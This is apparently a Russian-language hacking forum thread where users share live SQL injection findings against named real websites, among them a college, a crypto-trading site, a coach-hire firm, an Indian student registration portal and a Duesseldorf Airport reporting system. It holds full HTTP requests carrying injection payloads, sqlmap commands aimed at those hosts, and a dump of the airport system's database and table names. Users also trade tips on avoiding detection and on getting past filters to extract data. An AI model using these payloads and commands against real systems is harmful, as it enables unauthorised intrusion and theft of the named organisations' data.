Найденные интересеные SQL inj & XSS

[Sexy Kawai]

patternbuy какой-то гонконгский шоп дизайнов, внутри 2-3к юзеров и внутрений баланс вроде

sqlmap.py -r "1.txt" --dbs --random-agent --batch -p styleId --dbms=mysql --technique=E

POST /api/product/selectPage HTTP/1.1
Host: 47.251.7.2
Content-Length: 103
Access-Control-Allow-Origin: *
Accept: application/json, text/plain, */*
Access-Token:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36
Content-Type: application/json
Origin: http://47.251.7.2
Referer: http://47.251.7.2/store?q=Floral&ids=20010
Accept-Encoding: gzip, deflate, br
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close


{"priceRange":"","strSearchKeyword":"Floral","iDisplayStart":null,"iDisplayLength":100,"styleId":20010}

---
Parameter: JSON styleId ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: {"priceRange":"","strSearchKeyword":"Floral","iDisplayStart":null,"iDisplayLength":100,"styleId":"20010'||(SELECT 0x436e7547 WHERE 7085=7085 AND GTID_SUBSET(CONCAT(0x716b6a7171,(SELECT (ELT(2544=2544,1))),0x7171787071),2544))||'"}

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"priceRange":"","strSearchKeyword":"Floral","iDisplayStart":null,"iDisplayLength":100,"styleId":"20010'||(SELECT 0x6b704267 WHERE 4307=4307 AND (SELECT 2441 FROM (SELECT(SLEEP(5)))Oghp))||'"}
---

 

[cryptonic]

matanga xss

 

[Sexy Kawai]

sqlmap.py -u "https://cashforaction.com/orderview.php?cid=1&oid=1" --random-agent --batch --dbs --dbms=mysql --technique=U -p oid
какой-то нулевый индусский сайт по продаже и покупке крипты с 6 юзерами

 

[kosh_e4ka]

Бывают таргеты в которых приходится повышать лвл и риск вплоть до 5 и 3. Есть ли команда для мапы которая сама будет повышать риск для каждого лвла пока не найдется скуля? Чтоб каждый раз вручную не дописывать

 

[k4rk4j0i]

Бывают таргеты в которых приходится повышать лвл и риск вплоть до 5 и 3. Есть ли команда для мапы которая сама будет повышать риск для каждого лвла пока не найдется скуля? Чтоб каждый раз вручную не дописывать

А что мешает сразу указать максимальный?

 

[xargs]

А что мешает сразу указать максимальный?

разница есть, она существенная и один из важных минусов использовать 3,5 ето засрать логи запросами. Не забывайте что на 99% сайтов есть системы СЕО которые следят за трафиком и ботами, и эта вспышка активности может быть очень быстро обнаружена. Вобще лучше всего проверять скули руками а дампить уже инструментами.

 

[crimeninja]

разница есть, она существенная и один из важных минусов использовать 3,5 ето засрать логи запросами. Не забывайте что на 99% сайтов есть системы СЕО которые следят за трафиком и ботами, и эта вспышка активности может быть очень быстро обнаружена. Вобще лучше всего проверять скули руками а дампить уже инструментами.

а если например эту уязвимость нашёл акунетикс и уже отправил 100500 запросов для её обнаружения , есть ли смысл пытаться скрыть запросы от мапа которых сотню раз меньше?

 

[Tvar1]

Concord College of Canada

Concord College of Canada

www.concordcollege.ca

Forgot Password - Concord College of Canada

Concord College of Canada

www.concordcollege.ca

POST /password_forgot.php HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.concordcollege.ca/
Cookie: PHPSESSID=e25b5a921d8c27c3d81727c2a4453310
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: www.concordcollege.ca
Connection: Keep-alive

email=-1'%20OR%203*2*1=6%20AND%20000163=000163%20--%20&forgot_password=Get%20Password&loginfrom=%24referer

 

[magically]

URL: https://example.com/typo3conf/ext/ke_search/Classes/Lib/autocompletion.php
Parameter: onlyPublic
Пробовал sqlmap -u "https://example.com/typo3conf/ext/ke_search/Classes/Lib/autocompletion.php" -p OnlyPublic --level 5 --risk 3 --dbs ( отдает ошибку )
Какой запрос лучше использовать?

 

[k4rk4j0i]

URL: https://example.com/typo3conf/ext/ke_search/Classes/Lib/autocompletion.php
Parameter: onlyPublic
Пробовал sqlmap -u "https://example.com/typo3conf/ext/ke_search/Classes/Lib/autocompletion.php" -p OnlyPublic --level 5 --risk 3 --dbs ( отдает ошибку )
Какой запрос лучше использовать?

я так понимаю он у тебя в РОST запросе, а тебя тут GET и этого параметра нету

 

[Sexy Kawai]

URL: https://example.com/typo3conf/ext/ke_search/Classes/Lib/autocompletion.php
Parameter: onlyPublic
Пробовал sqlmap -u "https://example.com/typo3conf/ext/ke_search/Classes/Lib/autocompletion.php" -p OnlyPublic --level 5 --risk 3 --dbs ( отдает ошибку )
Какой запрос лучше использовать?

sqlmap -u "https://example.com/typo3conf/ext/ke_search/Classes/Lib/autocompletion.php" --data="сюда пост" -p OnlyPublic --level 5 --risk 3 --dbs
но рекомендую сканить через полный запрос " sqlmap -r ". И в запросе еще лучше кукисы удалять и юзерагенты, вместо этого в склмап добавить --random-agent

 

[magically]

я так понимаю он у тебя в РОST запросе, а тебя тут GET и этого параметра нету

sqlmap -u "https://example.com/typo3conf/ext/ke_search/Classes/Lib/autocompletion.php" --data="сюда пост" -p OnlyPublic --level 5 --risk 3 --dbs
но рекомендую сканить через полный запрос " sqlmap -r ". И в запросе еще лучше кукисы удалять и юзерагенты, вместо этого в склмап добавить --random-agent

а что если у меня уже есть фулл пейлоад?

 

[Sexy Kawai]

а что если у меня уже есть фулл пейлоад?

всм весь пэйлоад? ну в скульмапе так нельзя вроде,всё сканить надо, чтобы не насиловать линк можешь указать сразу какой вид скули и тип бд у тебя. Типо --dbms= и --technique=.
Чтоб я тебе точно помог лучше скинь полный запрос что тебе сканер выдал

 

[cryptonic]

GET /\ HTTP/1.1
Referer: https://coachhire.com.au/
Cookie: PHPSESSID=euuj3p7vt2sqpd4d90uffon7g3;GCLB=CLO9wI_Br5-VchAD;setlang=JS
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding: gzip,deflate
Host: coachhire.com.au
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive



HTTP/1.1 200 OK
Date: Sat, 01 Mar 2025 08:24:18 GMT
Server: Apache/2.4.62 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=UTF-8
Via: 1.1 google
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Original-Content-Encoding: gzip
Content-Length: 330


Error!: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\' LIMIT 1' at line 1<br/>Error!: SQLSTATE[23000]: Integrity constraint violation: 1048 Column 'admin' cannot be null<br/>

 

[cryptonic]

POST /studentregistration.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://financeolympiad.in/
Cookie: PHPSESSID=dakc41pse7s9bj722kh18qrjvv
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 294
Host: financeolympiad.in
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

address=3137%20Laguna%20Street&city=San%20Francisco&class=8&course[]=wgko%20Assesment%20-%20Rs%20250_250&email=sample%40email.tst&fname=PJztEXfj&lname=PJztEXfj&mobile=987-65-4329&package=Complete%20Package&paymentmode=NET_BANKING&pincode=94102&product=1'"&school=1&state=NY&studentregfrmsubmit=

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 01 Mar 2025 13:46:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Original-Content-Encoding: gzip
Content-Length: 245

Error description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"','wgko Assesment - Rs 250','250','PENDING','67c30fc9c53f6','','2025-03-01 19:1' at line 3

 

[antaboas777]

.

 

[indeep]

Duesseldorf Airport sql bug

GET /WebReport/WRDataLoader.php?day=0&month=0&nmtValidDate=2012-10-31&nmtid=1/((6-4)*(2-1)-1)&session=746149219465&year=0 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://dus-travis.dus.com/
Accept: [I]/[/I]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: dus-travis.dus.com
Connection: Keep-alive

 python sqlmap.py -u "https://dus-travis.dus.com/WebReport/WRDataLoader.php?day=0&month=0&nmtValidDate=2012-10-31&nmtid=1/((6-4)*(2-1)-1)&session=746149219465&year=0" --level 3  --risk 3       --headers="X-Forwarded-For: 127.0.0.1" --dbs    --random-agent  --dbs --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"   --text-only      -p nmtid   --force-dbms MYSQL

available databases [2]:
[*] information_schema
[*] travis

Database: travis
[28 tables]
+-----------------------------+
| tbl_actype                  |
| tbl_actype_description      |
| tbl_airport                 |
| tbl_airport_info            |
| tbl_complaint               |
| tbl_current_level           |
| tbl_current_plot            |
| tbl_downtime                |
| tbl_flight                  |
| tbl_flight_stat             |
| tbl_level                   |
| tbl_lmax_frequency          |
| tbl_map_overlay             |
| tbl_n2_stat                 |
| tbl_nmt                     |
| tbl_nmt_info                |
| tbl_nmt_mobile_measurements |
| tbl_nmt_visibility          |
| tbl_noise_server_status     |
| tbl_noise_stat              |
| tbl_noiseevent              |
| tbl_relevant_runways        |
| tbl_relevant_types          |
| tbl_route_usage             |
| tbl_runways                 |
| tbl_status_config           |
| tbl_type_mix                |
| tbl_weather                 |
+-----------------------------+

 

[Mezantrop]

Приветствую.
Если не в том разделе пишу, просьба перенести.
Проблема такая, нашел скулю, мапом вытаскивается только название БД, дальше тормоза.
Если выбираю режим перебора таблиц, то находит несколько, но данные не вытаскивает.
Собственно вопрос, как вытащить данные ?

   Type: UNION query
    Title: Generic UNION query (NULL) - 23 columns
    Payload: http://xxxxxxxx.world/gethint.php?q=-1" OR 3 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a7a7871,0x5843414e4e66474e53634b564d6648457474534f4d6969636f49434a5866557579536b4e4977594f,0x716b767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -21=6 AND 000364=000364 --
---
web application technology: PHP 8.2.27
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
sqlmap resumed the following injection point(s) from stored session:

Домен сайта пока не свечу.

 

[googlesearch]

Приветствую.
Если не в том разделе пишу, просьба перенести.
Проблема такая, нашел скулю, мапом вытаскивается только название БД, дальше тормоза.
Если выбираю режим перебора таблиц, то находит несколько, но данные не вытаскивает.
Собственно вопрос, как вытащить данные ?

   Type: UNION query
    Title: Generic UNION query (NULL) - 23 columns
    Payload: http://xxxxxxxx.world/gethint.php?q=-1" OR 3 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a7a7871,0x5843414e4e66474e53634b564d6648457474534f4d6969636f49434a5866557579536b4e4977594f,0x716b767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -21=6 AND 000364=000364 --
---
web application technology: PHP 8.2.27
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
sqlmap resumed the following injection point(s) from stored session:

Домен сайта пока не свечу.

скорее всего waf блочит , запусти мап с кодом -v 5 и глянь по ответам

 

[magically]

https://sorgenlos.de/ - дайте совет (POST (multipart) input ka was set to 10'XOR(1*if(now()=sysdate(),sleep(6),0))XOR'Z )

POST /de/anzeige.php?eid=service HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://sorgenlos.de/
Cookie: PHPSESSID=e5554ba43f673980f36c0c19a0b31c42; cookieok=1; eid=service
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
Content-Length: 448
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: sorgenlos.de
Connection: Keep-alive


------------YWJkMTQzNDcw
Content-Disposition: form-data; name="show"


1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="eid"


service
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="l"


DE
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="d"


1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="ka"


10'XOR(1*if(now()=sysdate(),sleep(6),0))XOR'Z
------------YWJkMTQzNDcw--